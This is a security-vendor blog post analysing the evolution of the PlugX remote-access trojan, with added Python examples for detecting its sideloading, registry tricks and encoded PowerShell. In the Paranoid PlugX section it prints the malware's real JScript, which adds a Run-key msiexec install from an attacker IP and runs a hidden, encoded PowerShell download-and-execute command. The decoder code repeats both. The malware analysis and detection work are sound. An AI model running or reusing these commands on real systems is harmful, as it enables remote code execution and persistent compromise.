URL: https://logrhythm.com/blog/deep-dive-into-plugx-malware/

TAKE A DEEP DIVE INTO PLUGX MALWARE

Posted on April 18, 2018 | Featured
Category: LogRhythm Labs | Security Tips and Tricks
Type: Blog

In June 2017, Palo Alto’s Unit 42 Threat Research team published an excellent
blog post on a newly detected version of the PlugX malware family, also known as
“Korplug.” Interested to find out more about this new variant, I started digging
around and found that there have been many new samples of “PlugX v1.” This isn’t
too surprising considering that a builder for version one of the malware has
been publicly available for several years. However, this piqued my curiosity. I
decided to look into where these old samples were used and whether there was any
specific targeting. In terms of malware detection, it is always interesting to
see old code repurposed or reused in new attacks and campaigns, as seen in the
resurgence of Shamoon Malware in 2016.


A HISTORY OF PLUGX MALWARE

The PlugX malware family is well known to researchers, with samples dating back
to as early as 2008, according to researchers at Trend Micro. PlugX is a fully
featured Remote Access Tool/Trojan (RAT) with capabilities such as file upload,
download, and modification, keystroke logging, webcam control, and access to a
remote cmd.exe shell.

Until recently, distinct versions of PlugX malware maintained consistent
methodologies for encryption, configuration, and persistence, despite the
evolution of the tool's development over the years. In 2014, there was a
resurgence of this malware family, making it the most utilized family of that
year, according to CrowdStrike's Global Threat Report released in February 2015.
Changes to the command and control (C2) options contributed to this resurgence:
the malware authors implemented a new DNS C2 methodology that made the traffic
harder to detect.

Until the end of 2016, the typical PlugX infection methodology was the same: The
malware payload was typically delivered via a phishing campaign, either as an
attached self-extracting RAR (SFX) archive, a link to an archive, or embedded in
a weaponized document. This archive contains three files that make up the PlugX
components. An example of these three components is as follows (extracted from
the RAR archive with SHA-256 hash
1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0):

Figure 1: PlugX Component Files

Although the above sample used an NVIDIA application, many PlugX samples of this
variant leveraged applications associated with antivirus or various other
security products. Because these executables are signed, legitimate
applications, endpoint security products are less likely to flag them.
Furthermore, usage of antivirus-related applications can potentially take
advantage of product whitelisting on the endpoint.

There have been many extensive analyses of the aforementioned PlugX variants
over the years, as is evident by the lengthy — and yet still incomplete —
references in the Appendix of this post, so I will not repeat a full analysis
here. However, a brief overview of the “original” or “classic” PlugX execution
method is available below.

Figure 2: PlugX SFX Archive Components


CLASSIC PLUGX EXECUTION METHODOLOGY

Below is a depiction of the execution methodology for the classic variant of
PlugX — most variants roughly follow this pattern, but there are some
deviations. Execution flow in general proceeds as follows:

 1. The three PlugX components are extracted from the archive to a temporary
    directory on the system.
 2. The legitimate, signed program is executed and the malicious loader DLL is
    sideloaded.
 3. The loader DLL decrypts and decompresses the payload file.
 4. The decrypted shellcode is injected into a legitimate system process.
    * Note: This step is performed in different ways (code injection, process
      hollowing) depending on the specific variant of PlugX, but the basic
      methodology is the same.
 5. Injected Windows process conducts C2/PlugX functionality.

Figure 3: PlugX Execution Chain
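
The chain above maps directly onto endpoint telemetry: an image-load event for a DLL that sits beside the host executable in a directory where a vendor-signed binary has no business running, followed by a remote-thread event from that same process into a Windows process. The Python below is an added example, not code from this post or from LogRhythm, that correlates those two signals over a handful of constructed Sysmon-style records. The field names follow Sysmon Event ID 7 (ImageLoad) and Event ID 8 (CreateRemoteThread); the paths, file names, PIDs, the list of scratch directories and the list of injection targets are all assumptions made for the example.

```python
"""Correlating endpoint telemetry for the classic PlugX chain:
signed host EXE in a scratch directory -> unsigned DLL sideloaded from the
same directory -> remote thread created in a system process.

Event records are constructed for this example (not real logs); field names
follow Sysmon Event ID 7 (ImageLoad) and Event ID 8 (CreateRemoteThread).
"""
import ntpath

# Directories a user (or a dropper) can write to; a vendor-signed binary
# executing from here is itself suspicious. Assumed list, extend per estate.
USER_WRITABLE_MARKERS = (
    "\\appdata\\local\\temp\\",
    "\\users\\public\\",
    "\\programdata\\",
    "\\windows\\temp\\",
)

# Processes PlugX-style loaders commonly inject into; assumed list.
INJECTION_TARGETS = {"svchost.exe", "explorer.exe", "msiexec.exe", "dllhost.exe"}


def in_user_writable_dir(path):
    """True if the path sits under one of the scratch directories above."""
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE_MARKERS)


def same_directory(path_a, path_b):
    """Case-insensitive comparison of the parent directories of two Windows paths."""
    return ntpath.dirname(path_a).lower() == ntpath.dirname(path_b).lower()


def find_sideload_chains(events):
    """Walk time-ordered events and return one alert per process that
    (1) loaded an unsigned DLL from its own user-writable directory and then
    (2) created a remote thread in a known injection target."""
    sideloads = {}  # ProcessId -> (host exe, sideloaded dll)
    alerts = []
    for ev in events:
        if ev["EventID"] == 7:
            exe, dll = ev["Image"], ev["ImageLoaded"]
            unsigned = ev.get("Signed", "false").lower() != "true"
            if unsigned and in_user_writable_dir(exe) and same_directory(exe, dll):
                sideloads[ev["ProcessId"]] = (exe, dll)
        elif ev["EventID"] == 8:
            pid = ev["SourceProcessId"]
            target = ntpath.basename(ev["TargetImage"]).lower()
            if pid in sideloads and target in INJECTION_TARGETS:
                exe, dll = sideloads[pid]
                alerts.append({
                    "pid": pid,
                    "host_exe": exe,
                    "loader_dll": dll,
                    "injected_into": ev["TargetImage"],
                })
    return alerts


# Constructed sample telemetry: file names, paths and PIDs are illustrative.
SAMPLE_EVENTS = [
    # PID 4120: vendor EXE run from %TEMP% loads an unsigned DLL beside it ...
    {"EventID": 7, "ProcessId": 4120,
     "Image": r"C:\Users\bob\AppData\Local\Temp\vendorupdate.exe",
     "ImageLoaded": r"C:\Users\bob\AppData\Local\Temp\vendorhelper.dll",
     "Signed": "false"},
    # ... and then creates a thread in svchost.exe.
    {"EventID": 8, "SourceProcessId": 4120,
     "SourceImage": r"C:\Users\bob\AppData\Local\Temp\vendorupdate.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe"},
    # PID 5208: the same vendor software installed properly, loading its signed DLL.
    {"EventID": 7, "ProcessId": 5208,
     "Image": r"C:\Program Files\Vendor\vendorupdate.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\vendorhelper.dll",
     "Signed": "true"},
    # PID 6001: portable software run from %TEMP% with its own signed DLL and
    # no injection; the signature check and the missing Event ID 8 keep it quiet.
    {"EventID": 7, "ProcessId": 6001,
     "Image": r"C:\Users\bob\AppData\Local\Temp\portable.exe",
     "ImageLoaded": r"C:\Users\bob\AppData\Local\Temp\portable_ui.dll",
     "Signed": "true"},
]

if __name__ == "__main__":
    for alert in find_sideload_chains(SAMPLE_EVENTS):
        print(alert)
```

Step 2 of the chain is what the ImageLoad filter catches: a DLL from the same user-writable directory as a binary that should not be running there, with no valid signature. Step 4 is the remote thread. Requiring both in one process keeps the rule quiet on portable software that merely carries its own DLLs, at the cost of missing variants that inject by process hollowing rather than CreateRemoteThread; those need a different second signal, such as Sysmon Event ID 10 (ProcessAccess) against the suspended child, in place of Event ID 8.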


CORE PLUGX MALWARE FUNCTIONALITY EVOLVES

In 2013, multiple updates to the core PlugX malware functionality occurred,
including the addition of new C2 protocols, encryption, and installation
methodologies. Researchers with Airbus analyzed several samples that appeared to
be from mid-to-late 2013. These samples represented an intermediate version of
PlugX, with characteristics falling between the original “v1” and “v2” variants.

The main updates in this variant included a new, custom encryption algorithm
used for configuration data, network communications, and strings within the
binaries. Also featured in this variant was the addition of the ICMP protocol as
a new C2 methodology and a modification of the HTTP packet format. Later
versions of this variant added DNS C2 as a module.

In 2013, researchers at Lastline also detected variants that included an update
to the PlugX malware deployment and installation methodologies. Although the
dropped files and chain of execution matched that of the classic PlugX variants
(three components: legitimate executable, loader DLL, and encrypted payload),
these samples featured User Account Control (UAC) evasion functionality and an
alternative process creation mechanism using Component Object Model (COM)
objects.

Researchers at Sophos first discovered a new strain of memory-resident PlugX at
the end of 2013. The malware was discovered in a campaign exploiting a
vulnerability in the popular Japanese word processing software, Ichitaro. Unlike
the classic PlugX samples that drop the three components previously discussed,
these "diskless" samples do not use the sideloading technique with a valid
executable: the loader DLL and payload are never written to disk as files. Upon
successful exploitation of the delivery vehicle (typically a weaponized Rich
Text Format (RTF) document), the memory-resident PlugX executes shellcode that
decrypts and decompresses the payload, a masked DLL that is then loaded into
memory and executed.

While 2014 showed a great uptick in the use of PlugX in Advanced Persistent
Threat (APT) campaigns, the variants observed mostly consisted of v1/v2
“classic” samples. In 2015, however, researchers observed a few variants that
deviated from the classic execution methodology and added a new communication
methodology to the PlugX repertoire. In the beginning of 2015, researchers from
JPCERT reported on a variant of PlugX that added peer-to-peer (P2P)
functionality, allowing the malware to communicate with other infected hosts on
the local network.

Fast forward to March 2015: Carbon Black detected an additional PlugX variant
that used a different loading methodology compared to earlier samples. In this
variant, only the loader DLL and encrypted payload are dropped to the system;
the malware uses the legitimate Windows system file rundll32.exe to execute the
malicious PlugX DLL from an export rather than relying on sideloading.

In August 2015, researchers at Airbus discovered a new variant of the “original”
PlugX. This variant utilized a fourth file in the initial installation of the
RAT. This file, also embedded in the SFX RAR, is a small executable file that
provides an additional execution method of the main binary. The executable
creates the registry value
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AppKey\18\ShellExecute
with the data pointing to the PlugX installation binary. This registry key maps
special keyboard keys to commands or programs, such as music or mail, that
execute when someone presses that key. Key number 18 typically corresponds to
the “calculator” key. Once this registry key is set, the malware
programmatically triggers a “press” of the key, thereby executing the
installation binary. This method effectively provides an alternative execution
of the malware chain.
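
Hunting for this trick in registry telemetry comes down to watching writes to AppKey\<n>\ShellExecute and asking where the command points. The Python below is an added example, not code from this post or from LogRhythm, that runs that check over constructed Sysmon Event ID 13 (registry value set) records. The key-code labels follow the WM_APPCOMMAND numbering that AppKey\<n> keys off (18 is LAUNCH_APP2, the calculator key named above); the SIDs, paths, file names and the list of trusted directories are assumptions made for the example.

```python
"""Hunting for the AppKey\\<n>\\ShellExecute execution trick in registry telemetry.

Event records are constructed for this example (not real logs); field names
follow Sysmon Event ID 13 (RegistryEvent: value set).
"""
import re

# AppKey\<n> is keyed by the WM_APPCOMMAND launch code; 18 (LAUNCH_APP2) is the
# key usually labelled "calculator". Assumed mapping of the common codes.
APPKEY_NAMES = {15: "mail", 16: "media select", 17: "launch app1", 18: "launch app2 (calculator)"}

APPKEY_VALUE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AppKey\\(\d+)\\ShellExecute$",
    re.IGNORECASE,
)

# Keyboard vendors set these values legitimately, normally pointing into
# Program Files or Windows; anything else deserves a look. Assumed list.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def first_token(command):
    """Return the executable portion of a ShellExecute command, honouring quotes."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def is_trusted_path(command):
    """True if the command's executable lives under a trusted directory."""
    return first_token(command).lower().startswith(TRUSTED_PREFIXES)


def triage_registry_events(events):
    """Return an alert for every AppKey ShellExecute value whose target lives
    outside the trusted directories, naming the key it hijacks and the writer."""
    alerts = []
    for ev in events:
        if ev["EventID"] != 13:
            continue
        match = APPKEY_VALUE.search(ev["TargetObject"])
        if not match:
            continue
        command = ev["Details"]
        if is_trusted_path(command):
            continue
        index = int(match.group(1))
        alerts.append({
            "appkey": index,
            "key_label": APPKEY_NAMES.get(index, "unknown"),
            "command": command,
            "set_by": ev["Image"],
        })
    return alerts


# Constructed sample telemetry; SIDs, paths and file names are illustrative.
SAMPLE_EVENTS = [
    # The dropped helper points the calculator key at the installer it dropped.
    {"EventID": 13, "Image": r"C:\Users\bob\AppData\Local\Temp\helper.exe",
     "TargetObject": r"HKU\S-1-5-21-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\AppKey\18\ShellExecute",
     "Details": r"C:\Users\bob\AppData\Local\Temp\install.exe"},
    # A keyboard utility mapping the mail key to its own installed binary.
    {"EventID": 13, "Image": r"C:\Program Files\KeyVendor\kbdcfg.exe",
     "TargetObject": r"HKU\S-1-5-21-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\AppKey\15\ShellExecute",
     "Details": r'"C:\Program Files\KeyVendor\mailclient.exe" /inbox'},
    # An unrelated Run-key write is not this check's concern.
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\bob\AppData\Local\Temp\install.exe"},
]

if __name__ == "__main__":
    for alert in triage_registry_events(SAMPLE_EVENTS):
        print(alert)
```

The value is not malicious on its own; keyboard utilities set it to map extra keys, which is why the check filters on the target path rather than on the presence of the value. The writer process (Image) is kept in the alert because, in the variant described above, it is the small fourth executable from the archive and is itself an artifact worth collecting.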

Similar to the 2008 campaign, PlugX is often used alongside another common RAT,
Poison Ivy. In 2017, researchers from JPCERT discovered a variant of PlugX with
code overlap with Poison Ivy in the form of a hash algorithm, used to obscure
the Windows API calls in the binary. The format of the final decrypted payload
in these new samples departed from that of previous PlugX variants; instead, it
mimicked the Poison Ivy format.

In June 2017, researchers at Palo Alto Networks released a review of a new PlugX
variant they detected on their networks, which they named "Paranoid PlugX." This
variant added several new mechanisms for avoiding security controls and
detection, including new methods for determining the C2 server address after
execution, a new loading methodology, and new methods for avoiding detection on
disk. Rather than dropping the executable, loader DLL, and payload to disk, this
variant used a short script (JScript driving WScript.Shell through
ActiveXObject, shown below) to make two attempts to download and execute the
code.

// JScript run through the Windows Script Host shell object. The quotes around the
// ProgID and around the reg.exe /d data were lost in extraction and are restored here.
a = new ActiveXObject("WScript.Shell");

// Attempt 1: persistence. Write a Run-key value so that, at every logon, msiexec.exe
// quietly (/q) installs (/i) a package fetched from the attacker's server. The "\."
// in the address is the original post's defanging of the URL.
a.run('%windir%\\System32\\reg.exe add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v MSASCuiL2 /t reg_sz /d "%windir%\\System32\\msiexec.exe /q /i hxxp://172.104.65\.97/Tasks.png" /f', 0);
window.close();

// Attempt 2: start 32-bit PowerShell (SysWOW64 path) with a hidden window, the
// execution policy bypassed (-ep bypass) and a base64/UTF-16LE encoded command
// (-enc) that downloads and runs guest.ps1 from the same host.
a.run('%windir%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle hidden -ep bypass -enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKAEkARQBYACAAJABuAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQAwADQALgA2ADUALgA5ADcALwBnAHUAZQBzAHQALgBwAHMAMQAnACkAOwAKAA==', 0);
window.close();


Figure 4: Paranoid PlugX Download and Execution Script

The first command creates persistence in the "Run" registry key: at each logon,
msiexec.exe quietly installs a package downloaded from the URL in the command.
The second command launches 32-bit PowerShell with a hidden window and the
execution policy bypassed; its base64-encoded (UTF-16LE) argument decodes to a
one-liner that uses a .NET WebClient's DownloadString and Invoke-Expression
(IEX) to fetch and run another PowerShell file, "guest.ps1", from the same IP
address as the first command. In both cases, the embedded PlugX shellcode that
ends up executing is identical. Another feature that makes Paranoid PlugX
deviate from previous variants is that the embedded payload is wrapped in a
.NET Framework file, which had not been seen in other samples.
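
Because the second command is base64 over UTF-16LE, the address it contacts never appears in the clear in process-creation logs; decoding the -enc argument is the step that recovers it. The Python below is an added example, not code from this post, from Unit 42 or from LogRhythm, that decodes the encoded command from the script above and pulls defanged URLs and the Run-key persistence write out of both command lines. The encoded string and the two command lines are taken from the script as printed (the backslash the post inserted into the first address to defang it is dropped so the URL parses); the set of -EncodedCommand spellings recognised and the defanging style are assumptions.

```python
"""Expanding and triaging the two Paranoid PlugX command lines shown above.

decode_encoded_command() reverses PowerShell's -EncodedCommand encoding
(base64 over UTF-16LE); triage() pulls URLs out of the literal and decoded
commands, defangs them for reporting, and notes the Run-key persistence write.
"""
import base64
import re
from urllib.parse import urlsplit

# The -enc argument exactly as printed in the script above.
ENCODED = (
    "JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKAEkA"
    "RQBYACAAJABuAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEA"
    "NwAyAC4AMQAwADQALgA2ADUALgA5ADcALwBnAHUAZQBzAHQALgBwAHMAMQAnACkAOwAKAA=="
)

# The two command lines from the script, as printed; the backslash the post
# inserted into the first address to defang it is dropped so the URL parses.
REG_CMD = (
    r"%windir%\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows"
    r"\CurrentVersion\Run /v MSASCuiL2 /t reg_sz /d %windir%\System32\msiexec.exe"
    r" /q /i hxxp://172.104.65.97/Tasks.png /f"
)
PS_CMD = (
    r"%windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden"
    " -ep bypass -enc " + ENCODED
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these cover the
# spellings met most often (-e, -ec, -en, -enc, -encodedcommand). Assumed set.
ENC_FLAG = re.compile(r"-e(?:c|n(?:c(?:odedcommand)?)?)?\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL = re.compile(r"\b(?:https?|hxxps?)://[^\s'\"()]+", re.IGNORECASE)
RUN_KEY_WRITE = re.compile(r"\breg(?:\.exe)?\s+add\s+\S*\\CurrentVersion\\Run\b", re.IGNORECASE)


def decode_encoded_command(b64):
    """Base64-decode and interpret as UTF-16LE, the encoding -enc expects."""
    return base64.b64decode(b64).decode("utf-16-le")


def expand_command(cmdline):
    """Return the decoded script if the command line carries an -enc argument,
    otherwise the command line itself."""
    match = ENC_FLAG.search(cmdline)
    return decode_encoded_command(match.group(1)) if match else cmdline


def defang(url):
    """Neutralise a URL for reporting: http -> hxxp, dots in the host bracketed."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower().replace("http", "hxxp")
    host = parts.netloc.replace(".", "[.]")
    rest = parts.path + (f"?{parts.query}" if parts.query else "")
    return f"{scheme}://{host}{rest}"


def triage(cmdlines):
    """Return defanged URLs, decoded scripts and Run-key persistence writes found
    in the given command lines, in order of appearance."""
    report = {"urls": [], "decoded": [], "persistence": []}
    for cmd in cmdlines:
        expanded = expand_command(cmd)
        if expanded is not cmd:
            report["decoded"].append(expanded.strip())
        report["urls"].extend(defang(u) for u in URL.findall(expanded))
        if RUN_KEY_WRITE.search(cmd):
            report["persistence"].append(cmd)
    return report


if __name__ == "__main__":
    for key, items in triage([REG_CMD, PS_CMD]).items():
        for item in items:
            print(f"{key}: {item}")
```

Script-block logging (PowerShell Event ID 4104) records the decoded text directly; the decoder is for the process-creation side, where only the encoded form is captured. Both command lines resolve to the same host, which is the detail worth pivoting on when hunting for either delivery attempt.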


TIMELINE OF PLUGX VARIANTS

The following is a rough timeline that illustrates when samples of the variants
discussed were initially reported publicly. Note: The dates below correspond to
detection/reporting of samples displaying the stated functionality — the actual
samples referenced may have compilation or creation dates earlier than those
listed below.

Figure 5: PlugX History Timeline


PLUGX REMAINS A THREAT

Although there have been several variants over the years, an analysis of the
timeline of variants discussed demonstrates the “original” PlugX variant
continues to be used today. Despite the evolution of PlugX methodologies and
techniques, these classic PlugX samples remain successful and are still utilized
in adversarial campaigns as a result.

In conducting this research, I found a wealth of information from different
research groups published over the last eight years. While this is by no means
inclusive of all PlugX research conducted, the resources cover many of the
highlights of the malware’s evolution over the years.

The sources for the PlugX variants mentioned above are listed in the Appendix.
